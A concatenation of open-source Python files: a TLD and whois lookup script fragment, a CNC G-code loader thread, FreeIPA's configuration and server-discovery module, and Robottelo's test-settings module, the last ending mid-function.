+ tld['name']) dbg(tld['name'] + ": " + str(tld['size'])) tlds.append(tld) tlds.sort(key=lambda tld: tld['size'], reverse=True) for ii in xrange(numTopTLDs): # Find FQDN of whois server d = dns.resolver.Resolver() try: resp = d.query(tlds[ii]['name'] + serverZone, 'CNAME') if len(resp.rrset) < 1: whois = 'UNKNOWN' else: whois = str(resp.rrset[0]).strip('.') except: whois = 'UNKNOWN' s = whois + ',' for dom in tlds[ii]['domains']: s += dom + '.' + tlds[ii]['name'] + ',' print s.strip(',')
fsantini/rasPyCNCController
gcode/GCodeLoader.py
# rasPyCNCController
# Copyright 2016 Francesco Santini <francesco.santini@gmail.com>
#
# This file is part of rasPyCNCController.
#
# rasPyCNCController is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# rasPyCNCController is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with rasPyCNCController.  If not, see <http://www.gnu.org/licenses/>.

from PySide import QtCore
from GCodeAnalyzer import GCodeAnalyzer
import sys
import pycnc_config


class GCodeLoader(QtCore.QThread):
    """Background thread that parses a G-code file, accumulating the raw
    lines, the cumulative travel time after each line, and the toolpath
    bounding box."""

    load_finished = QtCore.Signal()     # emitted on successful load
    load_error = QtCore.Signal(object)  # emitted with an error message string

    def __init__(self):
        QtCore.QThread.__init__(self)
        self.file = None       # path of the file to load (set by load())
        self.gcode = None      # list of raw g-code lines
        self.times = None      # cumulative travel time in seconds per line
        self.bBox = None       # bounding box computed by the analyzer
        self.loaded = False    # True once a file was parsed successfully
        self.totalTime = 0     # total travel time in seconds
        self.busy = False      # True while parsing
        self.g0_feed = pycnc_config.G0_FEED

    def run(self):
        """Thread body: parse self.file line by line."""
        self.loaded = False
        self.gcode = []
        self.times = []
        self.bBox = None
        self.totalTime = 0
        self.busy = True
        analyzer = GCodeAnalyzer()
        analyzer.fastf = self.g0_feed
        try:
            with open(self.file) as f:
                for line in f:
                    analyzer.Analyze(line)
                    self.gcode.append(line)
                    # time returned is in minutes: convert to seconds
                    self.times.append(analyzer.getTravelTime() * 60)
        except Exception as e:
            # BUG FIX: the previous bare "except:" reported
            # sys.exc_info()[0] — the exception *class*, not its message —
            # and also swallowed SystemExit/KeyboardInterrupt.
            self.busy = False
            self.load_error.emit("%s" % e)
            return
        self.busy = False
        self.loaded = True
        # Guard: an empty file used to crash on times[-1]
        self.totalTime = self.times[-1] if self.times else 0
        self.bBox = analyzer.getBoundingBox()
        self.load_finished.emit()

    def load(self, file):
        """Start loading `file` asynchronously; result is signalled via
        load_finished / load_error."""
        self.file = file
        self.start()
encukou/freeipa
ipapython/config.py
# Authors: Karl MacMillan <kmacmill@redhat.com> # # Copyright (C) 2007 Red Hat # see file 'COPYING' for use and warranty information # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from __future__ import absolute_import # pylint: disable=deprecated-module from optparse import ( Option, Values, OptionParser, IndentedHelpFormatter, OptionValueError) # pylint: enable=deprecated-module from copy import copy from configparser import SafeConfigParser from urllib.parse import urlsplit import socket import functools from dns.exception import DNSException import dns.name from ipaplatform.paths import paths from ipapython.dn import DN from ipapython.dnsutil import query_srv from ipapython.ipautil import CheckedIPAddress, CheckedIPAddressLoopback class IPAConfigError(Exception): def __init__(self, msg=''): self.msg = msg Exception.__init__(self, msg) def __repr__(self): return self.msg __str__ = __repr__ class IPAFormatter(IndentedHelpFormatter): """Our own optparse formatter that indents multiple lined usage string.""" def format_usage(self, usage): usage_string = "Usage:" spacing = " " * len(usage_string) lines = usage.split("\n") ret = "%s %s\n" % (usage_string, lines[0]) for line in lines[1:]: ret += "%s %s\n" % (spacing, line) return ret def check_ip_option(option, opt, value, allow_loopback=False): try: if allow_loopback: return CheckedIPAddressLoopback(value) else: return 
CheckedIPAddress(value) except Exception as e: raise OptionValueError("option {}: invalid IP address {}: {}" .format(opt, value, e)) def check_dn_option(option, opt, value): try: return DN(value) except Exception as e: raise OptionValueError("option %s: invalid DN: %s" % (opt, e)) def check_constructor(option, opt, value): con = option.constructor assert con is not None, "Oops! Developer forgot to set 'constructor' kwarg" try: return con(value) except Exception as e: raise OptionValueError("option {} invalid: {}".format(opt, e)) class IPAOption(Option): """ optparse.Option subclass with support of options labeled as security-sensitive such as passwords. """ ATTRS = Option.ATTRS + ["sensitive", "constructor"] TYPES = Option.TYPES + ("ip", "dn", "constructor", "ip_with_loopback") TYPE_CHECKER = copy(Option.TYPE_CHECKER) TYPE_CHECKER["ip"] = check_ip_option TYPE_CHECKER["ip_with_loopback"] = functools.partial(check_ip_option, allow_loopback=True) TYPE_CHECKER["dn"] = check_dn_option TYPE_CHECKER["constructor"] = check_constructor class IPAOptionParser(OptionParser): """ optparse.OptionParser subclass that uses IPAOption by default for storing options. 
""" def __init__(self, usage=None, option_list=None, option_class=IPAOption, version=None, conflict_handler="error", description=None, formatter=None, add_help_option=True, prog=None): OptionParser.__init__(self, usage, option_list, option_class, version, conflict_handler, description, formatter, add_help_option, prog) def get_safe_opts(self, opts): """ Returns all options except those with sensitive=True in the same fashion as parse_args would """ all_opts_dict = { o.dest: o for o in self._get_all_options() if hasattr(o, 'sensitive') } safe_opts_dict = {} for option, value in opts.__dict__.items(): if not all_opts_dict[option].sensitive: safe_opts_dict[option] = value return Values(safe_opts_dict) def verify_args(parser, args, needed_args = None): """Verify that we have all positional arguments we need, if not, exit.""" if needed_args: needed_list = needed_args.split(" ") else: needed_list = [] len_need = len(needed_list) len_have = len(args) if len_have > len_need: parser.error("too many arguments") elif len_have < len_need: parser.error("no %s specified" % needed_list[len_have]) class IPAConfig: def __init__(self): self.default_realm = None self.default_server = [] self.default_domain = None def get_realm(self): if self.default_realm: return self.default_realm else: raise IPAConfigError("no default realm") def get_server(self): if len(self.default_server): return self.default_server else: raise IPAConfigError("no default server") def get_domain(self): if self.default_domain: return self.default_domain else: raise IPAConfigError("no default domain") # Global library config config = IPAConfig() def __parse_config(discover_server = True): p = SafeConfigParser() p.read(paths.IPA_DEFAULT_CONF) try: if not config.default_realm: config.default_realm = p.get("global", "realm") except Exception: pass if discover_server: try: s = p.get("global", "xmlrpc_uri") server = urlsplit(s) config.default_server.append(server.netloc) except Exception: pass try: if not 
config.default_domain: config.default_domain = p.get("global", "domain") except Exception: pass def __discover_config(discover_server = True): servers = [] try: if not config.default_domain: # try once with REALM -> domain domain = str(config.default_realm).lower() name = "_ldap._tcp." + domain try: servers = query_srv(name) except DNSException: # try cycling on domain components of FQDN try: domain = dns.name.from_text(socket.getfqdn()) except DNSException: return False while True: domain = domain.parent() if str(domain) == '.': return False name = "_ldap._tcp.%s" % domain try: servers = query_srv(name) break except DNSException: pass config.default_domain = str(domain).rstrip(".") if discover_server: if not servers: name = "_ldap._tcp.%s." % config.default_domain try: servers = query_srv(name) except DNSException: pass for server in servers: hostname = str(server.target).rstrip(".") config.default_server.append(hostname) except Exception: pass return None def add_standard_options(parser): parser.add_option("--realm", dest="realm", help="Override default IPA realm") parser.add_option("--server", dest="server", help="Override default FQDN of IPA server") parser.add_option("--domain", dest="domain", help="Override default IPA DNS domain") def init_config(options=None): if options: config.default_realm = options.realm config.default_domain = options.domain if options.server: config.default_server.extend(options.server.split(",")) if len(config.default_server): discover_server = False else: discover_server = True __parse_config(discover_server) __discover_config(discover_server) # make sure the server list only contains unique items new_server = [] for server in config.default_server: if server not in new_server: new_server.append(server) config.default_server = new_server if not config.default_realm: raise IPAConfigError("IPA realm not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.") if not config.default_server: raise 
IPAConfigError("IPA server not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.") if not config.default_domain: raise IPAConfigError("IPA domain not found in the config file (/etc/ipa/default.conf) or on the command line.")
Ichimonji10/robottelo
robottelo/config/base.py
"""Define and instantiate the configuration class for Robottelo.""" import logging import os import sys from logging import config from nailgun import entities, entity_mixins from nailgun.config import ServerConfig from robottelo.config import casts from six.moves.urllib.parse import urlunsplit, urljoin from six.moves.configparser import ( NoOptionError, NoSectionError, ConfigParser ) LOGGER = logging.getLogger(__name__) SETTINGS_FILE_NAME = 'robottelo.properties' class ImproperlyConfigured(Exception): """Indicates that Robottelo somehow is improperly configured. For example, if settings file can not be found or some required configuration is not defined. """ def get_project_root(): """Return the path to the Robottelo project root directory. :return: A directory path. :rtype: str """ return os.path.realpath(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, )) class INIReader(object): """ConfigParser wrapper able to cast value when reading INI options.""" # Helper casters cast_boolean = casts.Boolean() cast_dict = casts.Dict() cast_list = casts.List() cast_logging_level = casts.LoggingLevel() cast_tuple = casts.Tuple() cast_webdriver_desired_capabilities = casts.WebdriverDesiredCapabilities() def __init__(self, path): self.config_parser = ConfigParser() with open(path) as handler: self.config_parser.readfp(handler) if sys.version_info[0] < 3: # ConfigParser.readfp is deprecated on Python3, read_file # replaces it self.config_parser.readfp(handler) else: self.config_parser.read_file(handler) def get(self, section, option, default=None, cast=None): """Read an option from a section of a INI file. The default value will return if the look up option is not available. The value will be cast using a callable if specified otherwise a string will be returned. :param section: Section to look for. :param option: Option to look for. :param default: The value that should be used if the option is not defined. 
:param cast: If provided the value will be cast using the cast provided. """ try: value = self.config_parser.get(section, option) if cast is not None: if cast is bool: value = self.cast_boolean(value) elif cast is dict: value = self.cast_dict(value) elif cast is list: value = self.cast_list(value) elif cast is tuple: value = self.cast_tuple(value) else: value = cast(value) except (NoSectionError, NoOptionError): value = default return value def has_section(self, section): """Check if section is available.""" return self.config_parser.has_section(section) class FeatureSettings(object): """Settings related to a feature. Create a instance of this class and assign attributes to map to the feature options. """ def read(self, reader): """Subclasses must implement this method in order to populate itself with expected settings values. :param reader: An INIReader instance to read the settings. """ raise NotImplementedError('Subclasses must implement read method.') def validate(self): """Subclasses must implement this method in order to validade the settings and raise ``ImproperlyConfigured`` if any issue is found. 
""" raise NotImplementedError('Subclasses must implement validate method.') class ServerSettings(FeatureSettings): """Satellite server settings definitions.""" def __init__(self, *args, **kwargs): super(ServerSettings, self).__init__(*args, **kwargs) self.admin_password = None self.admin_username = None self.hostname = None self.port = None self.scheme = None self.ssh_key = None self.ssh_password = None self.ssh_username = None def read(self, reader): """Read and validate Satellite server settings.""" self.admin_password = reader.get( 'server', 'admin_password', 'changeme') self.admin_username = reader.get( 'server', 'admin_username', 'admin') self.hostname = reader.get('server', 'hostname') self.port = reader.get('server', 'port', cast=int) self.scheme = reader.get('server', 'scheme', 'https') self.ssh_key = reader.get('server', 'ssh_key') self.ssh_password = reader.get('server', 'ssh_password') self.ssh_username = reader.get('server', 'ssh_username', 'root') def validate(self): validation_errors = [] if self.hostname is None: validation_errors.append('[server] hostname must be provided.') if (self.ssh_key is None and self.ssh_password is None): validation_errors.append( '[server] ssh_key or ssh_password must be provided.') return validation_errors def get_credentials(self): """Return credentials for interacting with a Foreman deployment API. :return: A username-password pair. :rtype: tuple """ return (self.admin_username, self.admin_password) def get_url(self): """Return the base URL of the Foreman deployment being tested. The following values from the config file are used to build the URL: * ``[server] scheme`` (default: https) * ``[server] hostname`` (required) * ``[server] port`` (default: none) Setting ``port`` to 80 does *not* imply that ``scheme`` is 'https'. If ``port`` is 80 and ``scheme`` is unset, ``scheme`` will still default to 'https'. :return: A URL. 
:rtype: str """ if not self.scheme: scheme = 'https' else: scheme = self.scheme # All anticipated error cases have been handled at this point. if not self.port: return urlunsplit((scheme, self.hostname, '', '', '')) else: return urlunsplit(( scheme, '{0}:{1}'.format(self.hostname, self.port), '', '', '' )) def get_pub_url(self): """Return the pub URL of the server being tested. The following values from the config file are used to build the URL: * ``main.server.hostname`` (required) :return: The pub directory URL. :rtype: str """ return urlunsplit(('http', self.hostname, 'pub/', '', '')) def get_cert_rpm_url(self): """Return the Katello cert RPM URL of the server being tested. The following values from the config file are used to build the URL: * ``main.server.hostname`` (required) :return: The Katello cert RPM URL. :rtype: str """ return urljoin( self.get_pub_url(), 'katello-ca-consumer-latest.noarch.rpm') class ClientsSettings(FeatureSettings): """Clients settings definitions.""" def __init__(self, *args, **kwargs): super(ClientsSettings, self).__init__(*args, **kwargs) self.image_dir = None self.provisioning_server = None def read(self, reader): """Read clients settings.""" self.image_dir = reader.get( 'clients', 'image_dir', '/opt/robottelo/images') self.provisioning_server = reader.get( 'clients', 'provisioning_server') def validate(self): """Validate clients settings.""" validation_errors = [] if self.provisioning_server is None: validation_errors.append( '[clients] provisioning_server option must be provided.') return validation_errors class DockerSettings(FeatureSettings): """Docker settings definitions.""" def __init__(self, *args, **kwargs): super(DockerSettings, self).__init__(*args, **kwargs) self.unix_socket = None self.external_url = None self.external_registry_1 = None self.external_registry_2 = None def read(self, reader): """Read docker settings.""" self.unix_socket = reader.get( 'docker', 'unix_socket', False, bool) self.external_url = 
reader.get('docker', 'external_url') self.external_registry_1 = reader.get('docker', 'external_registry_1') self.external_registry_2 = reader.get('docker', 'external_registry_2') def validate(self): """Validate docker settings.""" validation_errors = [] if not any((self.unix_socket, self.external_url)): validation_errors.append( 'Either [docker] unix_socket or external_url options must ' 'be provided or enabled.') if not all((self.external_registry_1, self.external_registry_2)): validation_errors.append( 'Both [docker] external_registry_1 and external_registry_2 ' 'options must be provided.') return validation_errors def get_unix_socket_url(self): """Use the unix socket connection to the local docker daemon. Make sure that your Satellite server's docker is configured to allow foreman user accessing it. This can be done by:: $ groupadd docker $ usermod -aG docker foreman # Add -G docker to the options for the docker daemon $ systemctl restart docker $ katello-service restart """ return ( 'unix:///var/run/docker.sock' if self.unix_socket else None ) class FakeManifestSettings(FeatureSettings): """Fake manifest settings defintitions.""" def __init__(self, *args, **kwargs): super(FakeManifestSettings, self).__init__(*args, **kwargs) self.cert_url = None self.key_url = None self.url = None def read(self, reader): """Read fake manifest settings.""" self.cert_url = reader.get( 'fake_manifest', 'cert_url') self.key_url = reader.get( 'fake_manifest', 'key_url') self.url = reader.get( 'fake_manifest', 'url') def validate(self): """Validate fake manifest settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [fake_manifest] cert_url, key_url, url options must ' 'be provided.' 
) return validation_errors class LDAPSettings(FeatureSettings): """LDAP settings definitions.""" def __init__(self, *args, **kwargs): super(LDAPSettings, self).__init__(*args, **kwargs) self.basedn = None self.grpbasedn = None self.hostname = None self.password = None self.username = None def read(self, reader): """Read LDAP settings.""" self.basedn = reader.get('ldap', 'basedn') self.grpbasedn = reader.get('ldap', 'grpbasedn') self.hostname = reader.get('ldap', 'hostname') self.password = reader.get('ldap', 'password') self.username = reader.get('ldap', 'username') def validate(self): """Validate LDAP settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [ldap] basedn, grpbasedn, hostname, password, ' 'username options must be provided.' ) return validation_errors class LibvirtHostSettings(FeatureSettings): """Libvirt host settings definitions.""" def __init__(self, *args, **kwargs): super(LibvirtHostSettings, self).__init__(*args, **kwargs) self.libvirt_image_dir = None self.libvirt_hostname = None def read(self, reader): """Read libvirt host settings.""" self.libvirt_image_dir = reader.get( 'compute_resources', 'libvirt_image_dir', '/var/lib/libvirt/images' ) self.libvirt_hostname = reader.get( 'compute_resources', 'libvirt_hostname') def validate(self): """Validate libvirt host settings.""" validation_errors = [] if self.libvirt_hostname is None: validation_errors.append( '[compute_resources] libvirt_hostname option must be provided.' 
) return validation_errors class FakeCapsuleSettings(FeatureSettings): """Fake Capsule settings definitions.""" def __init__(self, *args, **kwargs): super(FakeCapsuleSettings, self).__init__(*args, **kwargs) self.port_range = None def read(self, reader): """Read fake capsule settings""" self.port_range = reader.get( 'fake_capsules', 'port_range', cast=tuple ) def validate(self): """Validate fake capsule settings.""" validation_errors = [] if self.port_range is None: validation_errors.append( '[fake_capsules] port_range option must be provided.' ) return validation_errors class RHEVSettings(FeatureSettings): """RHEV settings definitions.""" def __init__(self, *args, **kwargs): super(RHEVSettings, self).__init__(*args, **kwargs) # Compute Resource Information self.hostname = None self.username = None self.password = None self.datacenter = None self.vm_name = None # Image Information self.image_os = None self.image_arch = None self.image_username = None self.image_password = None self.image_name = None def read(self, reader): """Read rhev settings.""" # Compute Resource Information self.hostname = reader.get('rhev', 'hostname') self.username = reader.get('rhev', 'username') self.password = reader.get('rhev', 'password') self.datacenter = reader.get('rhev', 'datacenter') self.vm_name = reader.get('rhev', 'vm_name') # Image Information self.image_os = reader.get('rhev', 'image_os') self.image_arch = reader.get('rhev', 'image_arch') self.image_username = reader.get('rhev', 'image_username') self.image_password = reader.get('rhev', 'image_password') self.image_name = reader.get('rhev', 'image_name') def validate(self): """Validate rhev settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [rhev] hostname, username, password, datacenter, ' 'vm_name, image_name, image_os, image_arch, image_usernam, ' 'image_name options must be provided.' 
) return validation_errors class VmWareSettings(FeatureSettings): """VmWare settings definitions.""" def __init__(self, *args, **kwargs): super(VmWareSettings, self).__init__(*args, **kwargs) # Compute Resource Information self.vcenter = None self.username = None self.password = None self.datacenter = None self.vm_name = None # Image Information self.image_os = None self.image_arch = None self.image_username = None self.image_password = None self.image_name = None def read(self, reader): """Read vmware settings.""" # Compute Resource Information self.vcenter = reader.get('vmware', 'hostname') self.username = reader.get('vmware', 'username') self.password = reader.get('vmware', 'password') self.datacenter = reader.get('vmware', 'datacenter') self.vm_name = reader.get('vmware', 'vm_name') # Image Information self.image_os = reader.get('vmware', 'image_os') self.image_arch = reader.get('vmware', 'image_arch') self.image_username = reader.get('vmware', 'image_username') self.image_password = reader.get('vmware', 'image_password') self.image_name = reader.get('vmware', 'image_name') def validate(self): """Validate vmware settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [vmware] hostname, username, password, datacenter, ' 'vm_name, image_name, image_os, image_arch, image_usernam, ' 'image_name options must be provided.' ) return validation_errors class DiscoveryISOSettings(FeatureSettings): """Discovery ISO name settings definition.""" def __init__(self, *args, **kwargs): super(DiscoveryISOSettings, self).__init__(*args, **kwargs) self.discovery_iso = None def read(self, reader): """Read discovery iso setting.""" self.discovery_iso = reader.get('discovery', 'discovery_iso') def validate(self): """Validate discovery iso name setting.""" validation_errors = [] if self.discovery_iso is None: validation_errors.append( '[discovery] discovery iso name must be provided.' 
) return validation_errors class OscapSettings(FeatureSettings): """Oscap settings definitions.""" def __init__(self, *args, **kwargs): super(OscapSettings, self).__init__(*args, **kwargs) self.content_path = None def read(self, reader): """Read Oscap settings.""" self.content_path = reader.get('oscap', 'content_path') def validate(self): """Validate Oscap settings.""" validation_errors = [] if self.content_path is None: validation_errors.append( '[oscap] content_path option must be provided.' ) return validation_errors class PerformanceSettings(FeatureSettings): """Performance settings definitions.""" def __init__(self, *args, **kwargs): super(PerformanceSettings, self).__init__(*args, **kwargs) self.time_hammer = None self.cdn_address = None self.virtual_machines = None self.fresh_install_savepoint = None self.enabled_repos_savepoint = None self.csv_buckets_count = None self.sync_count = None self.sync_type = None self.repos = None def read(self, reader): """Read performance settings.""" self.time_hammer = reader.get( 'performance', 'time_hammer', False, bool) self.cdn_address = reader.get( 'performance', 'cdn_address') self.virtual_machines = reader.get( 'performance', 'virtual_machines', cast=list) self.fresh_install_savepoint = reader.get( 'performance', 'fresh_install_savepoint') self.enabled_repos_savepoint = reader.get( 'performance', 'enabled_repos_savepoint') self.csv_buckets_count = reader.get( 'performance', 'csv_buckets_count', 10, int) self.sync_count = reader.get( 'performance', 'sync_count', 3, int) self.sync_type = reader.get( 'performance', 'sync_type', 'sync') self.repos = reader.get( 'performance', 'repos', cast=list) def validate(self): """Validate performance settings.""" validation_errors = [] if self.cdn_address is None: validation_errors.append( '[performance] cdn_address must be provided.') if self.virtual_machines is None: validation_errors.append( '[performance] virtual_machines must be provided.') if self.fresh_install_savepoint is 
None: validation_errors.append( '[performance] fresh_install_savepoint must be provided.') if self.enabled_repos_savepoint is None: validation_errors.append( '[performance] enabled_repos_savepoint must be provided.') return validation_errors class RHAISettings(FeatureSettings): """RHAI settings definitions.""" def __init__(self, *args, **kwargs): super(RHAISettings, self).__init__(*args, **kwargs) self.insights_client_el6repo = None self.insights_client_el7repo = None def read(self, reader): """Read RHAI settings.""" self.insights_client_el6repo = reader.get( 'rhai', 'insights_client_el6repo') self.insights_client_el7repo = reader.get( 'rhai', 'insights_client_el7repo') def validate(self): """Validate RHAI settings.""" return [] class TransitionSettings(FeatureSettings): """Transition settings definitions.""" def __init__(self, *args, **kwargs): super(TransitionSettings, self).__init__(*args, **kwargs) self.exported_data = None def read(self, reader): """Read transition settings.""" self.exported_data = reader.get('transition', 'exported_data') def validate(self): """Validate transition settings.""" validation_errors = [] if self.exported_data is None: validation_errors.append( '[transition] exported_data must be provided.') return validation_errors class VlanNetworkSettings(FeatureSettings): """Vlan Network settings definitions.""" def __init__(self, *args, **kwargs): super(VlanNetworkSettings, self).__init__(*args, **kwargs) self.subnet = None self.netmask = None self.gateway = None self.bridge = None def read(self, reader): """Read Vlan Network settings.""" self.subnet = reader.get('vlan_networking', 'subnet') self.netmask = reader.get('vlan_networking', 'netmask') self.gateway = reader.get('vlan_networking', 'gateway') self.bridge = reader.get('vlan_networking', 'bridge') def validate(self): """Validate Vlan Network settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [vlan_networking] subnet, netmask, gateway, 
bridge ' 'options must be provided.') return validation_errors class UpgradeSettings(FeatureSettings): """Satellite upgrade settings definitions.""" def __init__(self, *args, **kwargs): super(UpgradeSettings, self).__init__(*args, **kwargs) self.upgrade_data = None def read(self, reader): """Read and validate Satellite server settings.""" self.upgrade_data = reader.get('upgrade', 'upgrade_data') def validate(self): validation_errors = [] if self.upgrade_data is None: validation_errors.append('[upgrade] data must be provided.') return validation_errors class Settings(object): """Robottelo's settings representation.""" def __init__(self): self._all_features = None self._configured = False self._validation_errors = [] self.browser = None self.locale = None self.project = None self.reader = None self.rhel6_repo = None self.rhel7_repo = None self.screenshots_path = None self.saucelabs_key = None self.saucelabs_user = None self.server = ServerSettings() self.run_one_datapoint = None self.upstream = None self.verbosity = None self.webdriver = None self.webdriver_binary = None self.webdriver_desired_capabilities = None # Features self.clients = ClientsSettings() self.compute_resources = LibvirtHostSettings() self.discovery = DiscoveryISOSettings() self.docker = DockerSettings() self.fake_capsules = FakeCapsuleSettings() self.fake_manifest = FakeManifestSettings() self.ldap = LDAPSettings() self.oscap = OscapSettings() self.performance = PerformanceSettings() self.rhai = RHAISettings() self.rhev = RHEVSettings() self.transition = TransitionSettings() self.vlan_networking = VlanNetworkSettings() self.upgrade = UpgradeSettings() self.vmware = VmWareSettings() def configure(self): """Read the settings file and parse the configuration. :raises: ImproperlyConfigured if any issue is found during the parsing or validation of the configuration. """ if self.configured: # TODO: what to do here, raise and exception, just skip or ...? 
return # Expect the settings file to be on the robottelo project root. settings_path = os.path.join(get_project_root(), SETTINGS_FILE_NAME) if not os.path.isfile(settings_path): raise ImproperlyConfigured( 'Not able to find settings file at {}'.format(settings_path)) self.reader = INIReader(settings_path) self._read_robottelo_settings() self._validation_errors.extend( self._validate_robottelo_settings()) self.server.read(self.reader) self._validation_errors.extend(self.server.validate()) if self.reader.has_section('clients'): self.clients.read(self.reader) self._validation_errors.extend(self.clients.validate()) if self.reader.has_section('compute_resources'): self.compute_resources.read(self.reader) self._validation_errors.extend(self.compute_resources.validate()) if self.reader.has_section('discovery'): self.discovery.read(self.reader) self._validation_errors.extend(self.discovery.validate()) if self.reader.has_section('docker'): self.docker.read(self.reader) self._validation_errors.extend(self.docker.validate()) if self.reader.has_section('fake_capsules'): self.fake_capsules.read(self.reader) self._validation_errors.extend(self.fake_capsules.validate()) if self.reader.has_section('fake_manifest'): self.fake_manifest.read(self.reader) self._validation_errors.extend(self.fake_manifest.validate()) if self.reader.has_section('ldap'): self.ldap.read(self.reader) self._validation_errors.extend(self.ldap.validate()) if self.reader.has_section('oscap'): self.oscap.read(self.reader) self._validation_errors.extend(self.oscap.validate()) if self.reader.has_section('performance'): self.performance.read(self.reader) self._validation_errors.extend(self.performance.validate()) if self.reader.has_section('rhai'): self.rhai.read(self.reader) self._validation_errors.extend(self.rhai.validate()) if self.reader.has_section('rhev'): self.rhev.read(self.reader) self._validation_errors.extend(self.rhev.validate()) if self.reader.has_section('transition'): 
self.transition.read(self.reader) self._validation_errors.extend(self.transition.validate()) if self.reader.has_section('vlan_networking'): self.vlan_networking.read(self.reader) self._validation_errors.extend(self.vlan_networking.validate()) if self.reader.has_section('upgrade'): self.upgrade.read(self.reader) self._validation_errors.extend(self.upgrade.validate()) if self.reader.has_section('vmware'): self.vmware.read(self.reader) self._validation_errors.extend(self.vmware.validate()) if self._validation_errors: raise ImproperlyConfigured( 'Failed to validate the configuration, check the message(s):\n' '{}'.format('\n'.join(self._validation_errors)) ) self._configure_logging() self._configure_third_party_logging() self._configure_entities() self._configured = True def _read_robottelo_settings(self): """Read Robottelo's general settings.""" self.log_driver_commands = self.reader.get( 'robottelo', 'log_driver_commands', ['newSession', 'windowMaximize', 'get', 'findElement', 'sendKeysToElement', 'clickElement', 'mouseMoveTo'], list ) self.browser = self.reader.get( 'robottelo', 'browser', 'selenium') self.locale = self.reader.get('robottelo', 'locale', 'en_US.UTF-8') self.project = self.reader.get('robottelo', 'project', 'sat') self.rhel6_repo = self.reader.get('robottelo', 'rhel6_repo', None) self.rhel7_repo = self.reader.get('robottelo', 'rhel7_repo', None) self.screenshots_path = self.reader.get( 'robottelo', 'screenshots_path', '/tmp/robottelo/screenshots') self.run_one_datapoint = self.reader.get( 'robottelo', 'run_one_datapoint', False, bool) self.cleanup = self.reader.get('robottelo', 'cleanup', False, bool) self.upstream = self.reader.get('robottelo', 'upstream', True, bool) self.verbosity = self.reader.get( 'robottelo', 'verbosity', INIReader.cast_logging_level('debug'), INIReader.cast_logging_level ) self.webdriver = self.reader.get( 'robottelo', 'webdriver', 'firefox') self.saucelabs_user = self.reader.get( 'robottelo', 'saucelabs_user', None) 
        # (continuation of a reader-backed attribute block whose method header
        # is above this view) Optional Selenium/SauceLabs-related settings;
        # every one defaults to None when absent from the INI file.
        self.saucelabs_key = self.reader.get(
            'robottelo', 'saucelabs_key', None)
        self.webdriver_binary = self.reader.get(
            'robottelo', 'webdriver_binary', None)
        # Parsed into a capabilities object by the INIReader cast helper.
        self.webdriver_desired_capabilities = self.reader.get(
            'robottelo',
            'webdriver_desired_capabilities',
            None,
            cast=INIReader.cast_webdriver_desired_capabilities
        )
        self.window_manager_command = self.reader.get(
            'robottelo', 'window_manager_command', None)

    def _validate_robottelo_settings(self):
        """Validate Robottelo's general settings.

        Checks that ``browser`` and ``webdriver`` are among the supported
        choices and that SauceLabs credentials are present when the
        ``saucelabs`` browser is selected.

        :return: list of human-readable validation error messages (empty
            when every setting is valid).
        """
        validation_errors = []
        browsers = ('selenium', 'docker', 'saucelabs')
        webdrivers = ('chrome', 'firefox', 'ie', 'phantomjs', 'remote')
        if self.browser not in browsers:
            validation_errors.append(
                '[robottelo] browser should be one of {0}.'
                .format(', '.join(browsers))
            )
        if self.webdriver not in webdrivers:
            validation_errors.append(
                '[robottelo] webdriver should be one of {0}.'
                .format(', '.join(webdrivers))
            )
        # SauceLabs needs both a user and an API key to authenticate.
        if self.browser == 'saucelabs':
            if self.saucelabs_user is None:
                validation_errors.append(
                    '[robottelo] saucelabs_user must be provided when '
                    'browser is saucelabs.'
                )
            if self.saucelabs_key is None:
                validation_errors.append(
                    '[robottelo] saucelabs_key must be provided when '
                    'browser is saucelabs.'
                )
        return validation_errors

    @property
    def configured(self):
        """Returns True if the settings have already been configured."""
        return self._configured

    @property
    def all_features(self):
        """List all expected feature settings sections.

        Lazily computed on first access: any attribute of this object whose
        value is a ``FeatureSettings`` instance counts as a feature section.
        """
        if self._all_features is None:
            self._all_features = [
                name for name, value in vars(self).items()
                if isinstance(value, FeatureSettings)
            ]
        return self._all_features

    def _configure_entities(self):
        """Configure NailGun's entity classes.

        Do the following:

        * Set ``entity_mixins.CREATE_MISSING`` to ``True``. This causes method
          ``EntityCreateMixin.create_raw`` to generate values for empty and
          required fields.
        * Set ``nailgun.entity_mixins.DEFAULT_SERVER_CONFIG`` to whatever is
          returned by :meth:`robottelo.helpers.get_nailgun_config`. See
          ``robottelo.entity_mixins.Entity`` for more information on the
          effects of this.
        * Set a default value for ``nailgun.entities.GPGKey.content``.
        * Set the default value for
          ``nailgun.entities.DockerComputeResource.url`` if either
          ``docker.internal_url`` or ``docker.external_url`` is set in the
          configuration file.

        """
        entity_mixins.CREATE_MISSING = True
        entity_mixins.DEFAULT_SERVER_CONFIG = ServerConfig(
            self.server.get_url(),
            self.server.get_credentials(),
            # NOTE(review): TLS verification is disabled for all NailGun
            # traffic here — presumably because test servers use self-signed
            # certificates; confirm before reuse outside test contexts.
            verify=False,
        )

        # Monkey-patch GPGKey.__init__ so the ``content`` field defaults to
        # the bundled test GPG key. The original initializer is captured in a
        # closure and still runs first.
        gpgkey_init = entities.GPGKey.__init__

        def patched_gpgkey_init(self, server_config=None, **kwargs):
            """Set a default value on the ``content`` field."""
            gpgkey_init(self, server_config, **kwargs)
            self._fields['content'].default = os.path.join(
                get_project_root(),
                'tests', 'foreman', 'data', 'valid_gpg_key.txt'
            )
